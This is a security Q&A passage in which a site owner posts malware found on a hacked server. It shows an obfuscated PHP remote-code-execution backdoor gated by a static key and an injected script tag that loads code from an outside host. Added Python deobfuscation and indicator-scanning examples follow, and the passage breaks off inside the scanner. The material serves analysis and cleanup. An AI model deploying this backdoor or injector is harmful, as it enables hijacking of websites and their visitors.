PHP Hack Injection - Help fixing and understanding it [duplicate]

0

We were recently infected by a PHP hack and I was hoping you could shed some more light on the subject. Mainly: how does this hack work, and how do we fix it?

We are moving to a new setup, which according to our host is the best way to remediate this. However, if we can slow down or stop the hacks while we move, that would be much better.

The hackers inject into the headers of legitimate files and create new PHP files, which in most cases contain these various lines of code, which makes them easier to find when searching:

$GLOBALS[$GLOBALS['

$payload = "file_put_contents

"base" . "64_decode"

Array('1'=>

= isset($

if (!defined('ALREADY_RUN

**The majority contain this code:**
<?php ${"\x47\x4c\x4fB\x41\x4c\x53"}['s9b2'] = "\x76\x4f\x69\x63\x49\x6a\x66\x7c\x6c\x51\x3c\x4b\x2d\x20\x31\x29\x7b\x2c\x28\x46\x62\x52\x57\x42\x65\x45\x41\x59\x6f\x68\xa\x43\x9\x21\x3a\x61\x36\x77\x34\x7e\x7a\x5c\x2a\x3e\x71\x58\x6e\x32\x73\x27\x6b\x67\x5d\x78\x72\x44\x4a\x2e\x40\x5b\x37\x25\x38\x26\x5a\x50\x60\x3d\x3b\x56\x30\x4e\x3f\x70\x39\xd\x33\x53\x23\x2f\x22\x2b\x64\x79\x6d\x4d\x55\x7d\x5f\x75\x48\x54\x4c\x47\x35\x74\x5e\x24";
$GLOBALS[$GLOBALS['s9b2'][0].$GLOBALS['s9b2'][35].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][82].$GLOBALS['s9b2'][76].$GLOBALS['s9b2'][20]] = $GLOBALS['s9b2'][3].$GLOBALS['s9b2'][29].$GLOBALS['s9b2'][54];
$GLOBALS[$GLOBALS['s9b2'][8].$GLOBALS['s9b2'][47].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][47].$GLOBALS['s9b2'][94]] = $GLOBALS['s9b2'][28].$GLOBALS['s9b2'][54].$GLOBALS['s9b2'][82];
$GLOBALS[$GLOBALS['s9b2'][73].$GLOBALS['s9b2'][24].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][3].$GLOBALS['s9b2'][76].$GLOBALS['s9b2'][3]] = $GLOBALS['s9b2'][48].$GLOBALS['s9b2'][95].$GLOBALS['s9b2'][54].$GLOBALS['s9b2'][8].$GLOBALS['s9b2'][24].$GLOBALS['s9b2'][46];
$GLOBALS[$GLOBALS['s9b2'][54].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][36].$GLOBALS['s9b2'][70]] = $GLOBALS['s9b2'][2].$GLOBALS['s9b2'][46].$GLOBALS['s9b2'][2].$GLOBALS['s9b2'][88].$GLOBALS['s9b2'][48].$GLOBALS['s9b2'][24].$GLOBALS['s9b2'][95];
$GLOBALS[$GLOBALS['s9b2'][48].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][76].$GLOBALS['s9b2'][24].$GLOBALS['s9b2'][82].$GLOBALS['s9b2'][76].$GLOBALS['s9b2'][47].$GLOBALS['s9b2'][35]] = $GLOBALS['s9b2'][48].$GLOBALS['s9b2'][24].$GLOBALS['s9b2'][54].$GLOBALS['s9b2'][2].$GLOBALS['s9b2'][35].$GLOBALS['s9b2'][8].$GLOBALS['s9b2'][2].$GLOBALS['s9b2'][40].$GLOBALS['s9b2'][24];
$GLOBALS[$GLOBALS['s9b2'][8].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][47].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][70]] = $GLOBALS['s9b2'][73].$GLOBALS['s9b2'][29].$GLOBALS['s9b2'][73].$GLOBALS['s9b2'][0].$GLOBALS['s9b2'][24].$GLOBALS['s9b2'][54].$GLOBALS['s9b2'][48].$GLOBALS['s9b2'][2].$GLOBALS['s9b2'][28].$GLOBALS['s9b2'][46];
$GLOBALS[$GLOBALS['s9b2'][84].$GLOBALS['s9b2'][70].$GLOBALS['s9b2'][36].$GLOBALS['s9b2'][38].$GLOBALS['s9b2'][76].$GLOBALS['s9b2'][47].$GLOBALS['s9b2'][38].$GLOBALS['s9b2'][6].$GLOBALS['s9b2'][35]] = $GLOBALS['s9b2'][89].$GLOBALS['s9b2'][46].$GLOBALS['s9b2'][48].$GLOBALS['s9b2'][24].$GLOBALS['s9b2'][54].$GLOBALS['s9b2'][2].$GLOBALS['s9b2'][35].$GLOBALS['s9b2'][8].$GLOBALS['s9b2'][2].$GLOBALS['s9b2'][40].$GLOBALS['s9b2'][24];
$GLOBALS[$GLOBALS['s9b2'][6].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][76]] = $GLOBALS['s9b2'][20].$GLOBALS['s9b2'][35].$GLOBALS['s9b2'][48].$GLOBALS['s9b2'][24].$GLOBALS['s9b2'][36].$GLOBALS['s9b2'][38].$GLOBALS['s9b2'][88].$GLOBALS['s9b2'][82].$GLOBALS['s9b2'][24].$GLOBALS['s9b2'][3].$GLOBALS['s9b2'][28].$GLOBALS['s9b2'][82].$GLOBALS['s9b2'][24];
$GLOBALS[$GLOBALS['s9b2'][95].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][94].$GLOBALS['s9b2'][20].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][70].$GLOBALS['s9b2'][70]] = $GLOBALS['s9b2'][48].$GLOBALS['s9b2'][24].$GLOBALS['s9b2'][95].$GLOBALS['s9b2'][88].$GLOBALS['s9b2'][95].$GLOBALS['s9b2'][2].$GLOBALS['s9b2'][84].$GLOBALS['s9b2'][24].$GLOBALS['s9b2'][88].$GLOBALS['s9b2'][8].$GLOBALS['s9b2'][2].$GLOBALS['s9b2'][84].$GLOBALS['s9b2'][2].$GLOBALS['s9b2'][95];
$GLOBALS[$GLOBALS['s9b2'][83].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][70].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][14]] = $GLOBALS['s9b2'][95].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][82].$GLOBALS['s9b2'][20];
$GLOBALS[$GLOBALS['s9b2'][2].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][3].$GLOBALS['s9b2'][6].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][94].$GLOBALS['s9b2'][62].$GLOBALS['s9b2'][70]] = $GLOBALS['s9b2'][44].$GLOBALS['s9b2'][24].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][70].$GLOBALS['s9b2'][70].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][3].$GLOBALS['s9b2'][70].$GLOBALS['s9b2'][3];
$GLOBALS[$GLOBALS['s9b2'][95].$GLOBALS['s9b2'][36].$GLOBALS['s9b2'][6].$GLOBALS['s9b2'][70].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][6]] = $_POST;
$GLOBALS[$GLOBALS['s9b2'][54].$GLOBALS['s9b2'][94].$GLOBALS['s9b2'][6].$GLOBALS['s9b2'][35].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][20].$GLOBALS['s9b2'][36]] = $_COOKIE;
@$GLOBALS[$GLOBALS['s9b2'][54].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][36].$GLOBALS['s9b2'][70]]($GLOBALS['s9b2'][24].$GLOBALS['s9b2'][54].$GLOBALS['s9b2'][54].$GLOBALS['s9b2'][28].$GLOBALS['s9b2'][54].$GLOBALS['s9b2'][88].$GLOBALS['s9b2'][8].$GLOBALS['s9b2'][28].$GLOBALS['s9b2'][51], NULL);
@$GLOBALS[$GLOBALS['s9b2'][54].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][36].$GLOBALS['s9b2'][70]]($GLOBALS['s9b2'][8].$GLOBALS['s9b2'][28].$GLOBALS['s9b2'][51].$GLOBALS['s9b2'][88].$GLOBALS['s9b2'][24].$GLOBALS['s9b2'][54].$GLOBALS['s9b2'][54].$GLOBALS['s9b2'][28].$GLOBALS['s9b2'][54].$GLOBALS['s9b2'][48], 0);
@$GLOBALS[$GLOBALS['s9b2'][54].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][36].$GLOBALS['s9b2'][70]]($GLOBALS['s9b2'][84].$GLOBALS['s9b2'][35].$GLOBALS['s9b2'][53].$GLOBALS['s9b2'][88].$GLOBALS['s9b2'][24].$GLOBALS['s9b2'][53].$GLOBALS['s9b2'][24].$GLOBALS['s9b2'][3].$GLOBALS['s9b2'][89].$GLOBALS['s9b2'][95].$GLOBALS['s9b2'][2].$GLOBALS['s9b2'][28].$GLOBALS['s9b2'][46].$GLOBALS['s9b2'][88].$GLOBALS['s9b2'][95].$GLOBALS['s9b2'][2].$GLOBALS['s9b2'][84].$GLOBALS['s9b2'][24], 0);
@$GLOBALS[$GLOBALS['s9b2'][95].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][94].$GLOBALS['s9b2'][20].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][70].$GLOBALS['s9b2'][70]](0);

$qcecc0e0f = NULL;
$ide605a9 = NULL;

$GLOBALS[$GLOBALS['s9b2'][48].$GLOBALS['s9b2'][94].$GLOBALS['s9b2'][3].$GLOBALS['s9b2'][6].$GLOBALS['s9b2'][94].$GLOBALS['s9b2'][70].$GLOBALS['s9b2'][47].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][82]] = $GLOBALS['s9b2'][3].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][20].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][3].$GLOBALS['s9b2'][38].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][12].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][38].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][35].$GLOBALS['s9b2'][12].$GLOBALS['s9b2'][38].$GLOBALS['s9b2'][20].$GLOBALS['s9b2'][94].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][12].$GLOBALS['s9b2'][20].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][38].$GLOBALS['s9b2'][70].$GLOBALS['s9b2'][12].$GLOBALS['s9b2'][62].$GLOBALS['s9b2'][36].$GLOBALS['s9b2'][36].$GLOBALS['s9b2'][20].$GLOBALS['s9b2'][76].$GLOBALS['s9b2'][82].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][6].$GLOBALS['s9b2'][36].$GLOBALS['s9b2'][35].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][24];
global $s5cf5021d;

function qe9001c0c($qcecc0e0f, $v42282)
{
    $sbec70da = "";

    for ($s11c3d0e5=0; $s11c3d0e5<$GLOBALS[$GLOBALS['s9b2'][73].$GLOBALS['s9b2'][24].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][3].$GLOBALS['s9b2'][76].$GLOBALS['s9b2'][3]]($qcecc0e0f);)
    {
        for ($k310c1a=0; $k310c1a<$GLOBALS[$GLOBALS['s9b2'][73].$GLOBALS['s9b2'][24].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][3].$GLOBALS['s9b2'][76].$GLOBALS['s9b2'][3]]($v42282) && $s11c3d0e5<$GLOBALS[$GLOBALS['s9b2'][73].$GLOBALS['s9b2'][24].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][3].$GLOBALS['s9b2'][76].$GLOBALS['s9b2'][3]]($qcecc0e0f); $k310c1a++, $s11c3d0e5++)
        {
            $sbec70da .= $GLOBALS[$GLOBALS['s9b2'][0].$GLOBALS['s9b2'][35].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][82].$GLOBALS['s9b2'][76].$GLOBALS['s9b2'][20]]($GLOBALS[$GLOBALS['s9b2'][8].$GLOBALS['s9b2'][47].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][47].$GLOBALS['s9b2'][94]]($qcecc0e0f[$s11c3d0e5]) ^ $GLOBALS[$GLOBALS['s9b2'][8].$GLOBALS['s9b2'][47].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][47].$GLOBALS['s9b2'][94]]($v42282[$k310c1a]));
        }
    }

    return $sbec70da;
}

function t1db($qcecc0e0f, $v42282)
{
    global $s5cf5021d;

    return $GLOBALS[$GLOBALS['s9b2'][2].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][3].$GLOBALS['s9b2'][6].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][94].$GLOBALS['s9b2'][62].$GLOBALS['s9b2'][70]]($GLOBALS[$GLOBALS['s9b2'][2].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][3].$GLOBALS['s9b2'][6].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][94].$GLOBALS['s9b2'][62].$GLOBALS['s9b2'][70]]($qcecc0e0f, $s5cf5021d), $v42282);
}

foreach ($GLOBALS[$GLOBALS['s9b2'][54].$GLOBALS['s9b2'][94].$GLOBALS['s9b2'][6].$GLOBALS['s9b2'][35].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][20].$GLOBALS['s9b2'][36]] as $v42282=>$r26d29)
{
    $qcecc0e0f = $r26d29;
    $ide605a9 = $v42282;
}

if (!$qcecc0e0f)
{
    foreach ($GLOBALS[$GLOBALS['s9b2'][95].$GLOBALS['s9b2'][36].$GLOBALS['s9b2'][6].$GLOBALS['s9b2'][70].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][6]] as $v42282=>$r26d29)
    {
        $qcecc0e0f = $r26d29;
        $ide605a9 = $v42282;
    }
}

$qcecc0e0f = @$GLOBALS[$GLOBALS['s9b2'][84].$GLOBALS['s9b2'][70].$GLOBALS['s9b2'][36].$GLOBALS['s9b2'][38].$GLOBALS['s9b2'][76].$GLOBALS['s9b2'][47].$GLOBALS['s9b2'][38].$GLOBALS['s9b2'][6].$GLOBALS['s9b2'][35]]($GLOBALS[$GLOBALS['s9b2'][83].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][70].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][14]]($GLOBALS[$GLOBALS['s9b2'][6].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][76]]($qcecc0e0f), $ide605a9));
if (isset($qcecc0e0f[$GLOBALS['s9b2'][35].$GLOBALS['s9b2'][50]]) && $s5cf5021d==$qcecc0e0f[$GLOBALS['s9b2'][35].$GLOBALS['s9b2'][50]])
{
    if ($qcecc0e0f[$GLOBALS['s9b2'][35]] == $GLOBALS['s9b2'][2])
    {
        $s11c3d0e5 = Array(
            $GLOBALS['s9b2'][73].$GLOBALS['s9b2'][0] => @$GLOBALS[$GLOBALS['s9b2'][8].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][47].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][70]](),
            $GLOBALS['s9b2'][48].$GLOBALS['s9b2'][0] => $GLOBALS['s9b2'][14].$GLOBALS['s9b2'][57].$GLOBALS['s9b2'][70].$GLOBALS['s9b2'][12].$GLOBALS['s9b2'][14],
        );
        echo @$GLOBALS[$GLOBALS['s9b2'][48].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][76].$GLOBALS['s9b2'][24].$GLOBALS['s9b2'][82].$GLOBALS['s9b2'][76].$GLOBALS['s9b2'][47].$GLOBALS['s9b2'][35]]($s11c3d0e5);
    }
    elseif ($qcecc0e0f[$GLOBALS['s9b2'][35]] == $GLOBALS['s9b2'][24])
    {
        eval($qcecc0e0f[$GLOBALS['s9b2'][82]]);
    }
    exit();
}

New example of an infected header:

<script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"="+b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.length;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b))return e.substring(b.length,e.length)}return null}null==getCookie("__cfgoid")&&(setCookie("__cfgoid",1,1),1==getCookie("__cfgoid")&&(setCookie("__cfgoid",2,1),document.write('<script type="text/javascript" src="' + 'http://solventoffertes.be/js/jquery.min.php' + '?key=b64' + '&utm_campaign=' + 'I92930' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k=(function(){var keywords = '';var metas = document.getElementsByTagName('meta');if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == "keywords") {keywords += metas[x].content;}}}return keywords !== '' ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' + encodeURIComponent(do

There are about 4 different variants, but the GLOBALS one is the most common.

Any idea how to fix this, and how it works?

    
asked by Rico 14.12.2016 - 23:33
source
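As an added example (it is not code from the question or the answer), the following Python script undoes the two layers of obfuscation in the dropper posted above so its logic can be read. It decodes the `\xHH` string table, resolves every `$GLOBALS['s9b2'][N]` concatenation chain into the literal it builds, then inlines the `$GLOBALS['alias'] = 'function'` indirections at their call sites. The sample lines embedded in it are copied from the dropper with the indentation removed; the script assumes the table is named `s9b2`, as in this variant, and would need that name changed for the other variants.

```python
import re

# Constructed sample: the string table and a selection of lines copied from the
# dropper posted in the question (leading indentation dropped). The odd-looking
# ${"\x47\x4c\x4fB\x41\x4c\x53"} on its first line is just "GLOBALS" in hex escapes.
TABLE_LITERAL = (
    r"\x76\x4f\x69\x63\x49\x6a\x66\x7c\x6c\x51\x3c\x4b\x2d\x20\x31\x29\x7b\x2c\x28\x46"
    r"\x62\x52\x57\x42\x65\x45\x41\x59\x6f\x68\xa\x43\x9\x21\x3a\x61\x36\x77\x34\x7e"
    r"\x7a\x5c\x2a\x3e\x71\x58\x6e\x32\x73\x27\x6b\x67\x5d\x78\x72\x44\x4a\x2e\x40\x5b"
    r"\x37\x25\x38\x26\x5a\x50\x60\x3d\x3b\x56\x30\x4e\x3f\x70\x39\xd\x33\x53\x23\x2f"
    r"\x22\x2b\x64\x79\x6d\x4d\x55\x7d\x5f\x75\x48\x54\x4c\x47\x35\x74\x5e\x24"
)

SAMPLE_LINES = [
    "$GLOBALS[$GLOBALS['s9b2'][0].$GLOBALS['s9b2'][35].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][82].$GLOBALS['s9b2'][76].$GLOBALS['s9b2'][20]] = $GLOBALS['s9b2'][3].$GLOBALS['s9b2'][29].$GLOBALS['s9b2'][54];",
    "$GLOBALS[$GLOBALS['s9b2'][54].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][36].$GLOBALS['s9b2'][70]] = $GLOBALS['s9b2'][2].$GLOBALS['s9b2'][46].$GLOBALS['s9b2'][2].$GLOBALS['s9b2'][88].$GLOBALS['s9b2'][48].$GLOBALS['s9b2'][24].$GLOBALS['s9b2'][95];",
    "$GLOBALS[$GLOBALS['s9b2'][84].$GLOBALS['s9b2'][70].$GLOBALS['s9b2'][36].$GLOBALS['s9b2'][38].$GLOBALS['s9b2'][76].$GLOBALS['s9b2'][47].$GLOBALS['s9b2'][38].$GLOBALS['s9b2'][6].$GLOBALS['s9b2'][35]] = $GLOBALS['s9b2'][89].$GLOBALS['s9b2'][46].$GLOBALS['s9b2'][48].$GLOBALS['s9b2'][24].$GLOBALS['s9b2'][54].$GLOBALS['s9b2'][2].$GLOBALS['s9b2'][35].$GLOBALS['s9b2'][8].$GLOBALS['s9b2'][2].$GLOBALS['s9b2'][40].$GLOBALS['s9b2'][24];",
    "$GLOBALS[$GLOBALS['s9b2'][6].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][76]] = $GLOBALS['s9b2'][20].$GLOBALS['s9b2'][35].$GLOBALS['s9b2'][48].$GLOBALS['s9b2'][24].$GLOBALS['s9b2'][36].$GLOBALS['s9b2'][38].$GLOBALS['s9b2'][88].$GLOBALS['s9b2'][82].$GLOBALS['s9b2'][24].$GLOBALS['s9b2'][3].$GLOBALS['s9b2'][28].$GLOBALS['s9b2'][82].$GLOBALS['s9b2'][24];",
    "$GLOBALS[$GLOBALS['s9b2'][83].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][70].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][14]] = $GLOBALS['s9b2'][95].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][82].$GLOBALS['s9b2'][20];",
    "$GLOBALS[$GLOBALS['s9b2'][95].$GLOBALS['s9b2'][36].$GLOBALS['s9b2'][6].$GLOBALS['s9b2'][70].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][6]] = $_POST;",
    "$GLOBALS[$GLOBALS['s9b2'][54].$GLOBALS['s9b2'][94].$GLOBALS['s9b2'][6].$GLOBALS['s9b2'][35].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][20].$GLOBALS['s9b2'][36]] = $_COOKIE;",
    "@$GLOBALS[$GLOBALS['s9b2'][54].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][36].$GLOBALS['s9b2'][70]]($GLOBALS['s9b2'][24].$GLOBALS['s9b2'][54].$GLOBALS['s9b2'][54].$GLOBALS['s9b2'][28].$GLOBALS['s9b2'][54].$GLOBALS['s9b2'][88].$GLOBALS['s9b2'][8].$GLOBALS['s9b2'][28].$GLOBALS['s9b2'][51], NULL);",
    "$GLOBALS[$GLOBALS['s9b2'][48].$GLOBALS['s9b2'][94].$GLOBALS['s9b2'][3].$GLOBALS['s9b2'][6].$GLOBALS['s9b2'][94].$GLOBALS['s9b2'][70].$GLOBALS['s9b2'][47].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][82]] = $GLOBALS['s9b2'][3].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][20].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][3].$GLOBALS['s9b2'][38].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][12].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][38].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][35].$GLOBALS['s9b2'][12].$GLOBALS['s9b2'][38].$GLOBALS['s9b2'][20].$GLOBALS['s9b2'][94].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][12].$GLOBALS['s9b2'][20].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][38].$GLOBALS['s9b2'][70].$GLOBALS['s9b2'][12].$GLOBALS['s9b2'][62].$GLOBALS['s9b2'][36].$GLOBALS['s9b2'][36].$GLOBALS['s9b2'][20].$GLOBALS['s9b2'][76].$GLOBALS['s9b2'][82].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][6].$GLOBALS['s9b2'][36].$GLOBALS['s9b2'][35].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][24];",
    "$qcecc0e0f = @$GLOBALS[$GLOBALS['s9b2'][84].$GLOBALS['s9b2'][70].$GLOBALS['s9b2'][36].$GLOBALS['s9b2'][38].$GLOBALS['s9b2'][76].$GLOBALS['s9b2'][47].$GLOBALS['s9b2'][38].$GLOBALS['s9b2'][6].$GLOBALS['s9b2'][35]]($GLOBALS[$GLOBALS['s9b2'][83].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][70].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][14]]($GLOBALS[$GLOBALS['s9b2'][6].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][76]]($qcecc0e0f), $ide605a9));",
    "if (isset($qcecc0e0f[$GLOBALS['s9b2'][35].$GLOBALS['s9b2'][50]]) && $s5cf5021d==$qcecc0e0f[$GLOBALS['s9b2'][35].$GLOBALS['s9b2'][50]])",
    "elseif ($qcecc0e0f[$GLOBALS['s9b2'][35]] == $GLOBALS['s9b2'][24])",
    "eval($qcecc0e0f[$GLOBALS['s9b2'][82]]);",
]


def decode_php_hex(literal):
    """Expand PHP double-quoted \\xH / \\xHH escapes (1 or 2 hex digits) to characters."""
    return re.sub(r"\\x([0-9A-Fa-f]{1,2})", lambda m: chr(int(m.group(1), 16)), literal)


TABLE = decode_php_hex(TABLE_LITERAL)

INDEX_RE = r"\$GLOBALS\['s9b2'\]\[(\d+)\]"                            # one $GLOBALS['s9b2'][N]
CHAIN_RE = re.compile(INDEX_RE + r"(?:\s*\.\s*" + INDEX_RE + r")*")   # N . N . N ... chains
ALIAS_RE = re.compile(r"\$GLOBALS\['(\w+)'\]\s*=\s*(?:'([^']*)'|(\$_[A-Z]+));")


def resolve_chain(chain):
    """Concatenate the table characters selected by an index chain."""
    return "".join(TABLE[int(i)] for i in re.findall(INDEX_RE, chain))


def php_quote(s):
    return "'" + s.replace("\\", "\\\\").replace("'", "\\'") + "'"


def deobfuscate_line(line):
    """Pass 1: replace every index chain with the PHP string literal it builds."""
    return CHAIN_RE.sub(lambda m: php_quote(resolve_chain(m.group(0))), line)


def deobfuscate(lines):
    """Pass 2: collect $GLOBALS['alias'] = 'name' definitions and inline them at
    every call site, so @$GLOBALS['r17960'](...) reads as @ini_set(...).
    Returns (alias table, rewritten lines)."""
    stage1 = [deobfuscate_line(l) for l in lines]
    aliases = {}
    for l in stage1:
        m = ALIAS_RE.match(l.strip())
        if m:
            aliases[m.group(1)] = m.group(2) if m.group(2) is not None else m.group(3)
    out = []
    for l in stage1:
        m = ALIAS_RE.match(l.strip())
        if m:
            out.append("// %s -> %s" % (m.group(1), aliases[m.group(1)]))
        else:
            out.append(re.sub(r"\$GLOBALS\['(\w+)'\]",
                              lambda mm: aliases.get(mm.group(1), mm.group(0)), l))
    return aliases, out


if __name__ == "__main__":
    _, readable = deobfuscate(SAMPLE_LINES)
    print("\n".join(readable))
```

Run over the full dropper, the output reads as plain PHP: it disables error logging and the execution time limit, takes the last cookie (falling back to the last POST field), base64-decodes its value, XORs it with the hard-coded key `c7b97c49-749a-4b51-b140-866b3d9f6a7e` and then with the cookie's own name, and unserializes the result. If the array carries `ak` equal to that key, `a == 'i'` answers with `phpversion()` and a version string, `a == 'e'` runs `eval()` on the `d` element, and the script exits. In other words, it is a remote code execution backdoor gated by a static key, which is why the hackers can keep re-dropping files as long as any copy survives.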

1 answer

0

This looks similar to the MageCart hack. Look at the examples here: link

Basically, what they are doing is stealing information from your site's users. The fact that they are writing new files to your OS is concerning. You need to work with a security professional to clean up your site. That involves changing all previous passwords, finding and removing all the malicious code, discovering how the hackers got in, etc. If you are more technical, you can find some security best practices for the application installed on your system, and see the link Anders gave you in the comment for some more general information.

    
answered 15.12.2016 - 00:32
source
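For the "find and remove all the malicious code" step, here is an added example (not from the answer or the question) of a small scanner that walks a webroot and reports every file and line matching the fragments the poster listed, the `__cfgoid` cookie gate from the injected header, and, more generally, any `${"..."}` variable name spelled with hex escapes. The indicators are assumed to be sufficient for this campaign only; the demo webroot it builds in a temp directory is constructed for the example.

```python
import os
import re
import tempfile

# Indicators taken from the question: fragments the poster found in the dropped
# PHP files and the cookie gate of the injected <script> header. They are assumed
# to be enough to flag this campaign; they are not a general webshell detector.
SIGNATURES = [
    "$GLOBALS[$GLOBALS['",
    '$payload = "file_put_contents',
    '"base" . "64_decode"',
    "Array('1'=>",
    "= isset($",
    "if (!defined('ALREADY_RUN",
    'getCookie("__cfgoid")',
]
# The dropper names $GLOBALS as ${"\x47\x4c\x4fB\x41\x4c\x53"}; any variable-variable
# spelled with hex escapes is worth a look, so match that shape generically.
HEX_VARVAR_RE = re.compile(r'\$\{"[^"]*\\x[0-9A-Fa-f]{1,2}[^"]*"\}')
SCAN_EXT = (".php", ".phtml", ".inc", ".html", ".htm", ".js")


def scan_file(path):
    """Return [(line number, indicator)] for every indicator hit in one file."""
    hits = []
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        for lineno, line in enumerate(fh, 1):
            hits.extend((lineno, sig) for sig in SIGNATURES if sig in line)
            if HEX_VARVAR_RE.search(line):
                hits.append((lineno, 'hex-escaped ${"..."} variable name'))
    return hits


def scan_tree(root):
    """Walk a webroot; return {relative path: hits} for files with at least one hit."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(SCAN_EXT):
                continue
            path = os.path.join(dirpath, name)
            hits = scan_file(path)
            if hits:
                report[os.path.relpath(path, root).replace(os.sep, "/")] = hits
    return report


def build_demo_tree():
    """Constructed webroot (assumed layout): a clean file, a two-line stub of the
    dropper, and a page carrying the injected header. Returns the temp directory."""
    root = tempfile.mkdtemp(prefix="webroot_")
    os.mkdir(os.path.join(root, "uploads"))
    files = {
        "index.php": "<?php\necho 'hello';\n",
        "uploads/cache.php": "\n".join([
            r"""<?php ${"\x47\x4c\x4fB\x41\x4c\x53"}['s9b2'] = "\x76\x4f\x69";""",
            "$GLOBALS[$GLOBALS['s9b2'][0].$GLOBALS['s9b2'][1]] = 'x';",
        ]) + "\n",
        "header.php": '<html><head><script>null==getCookie("__cfgoid")&&'
                      '(setCookie("__cfgoid",1,1));</script></head></html>\n',
    }
    for rel, body in files.items():
        with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
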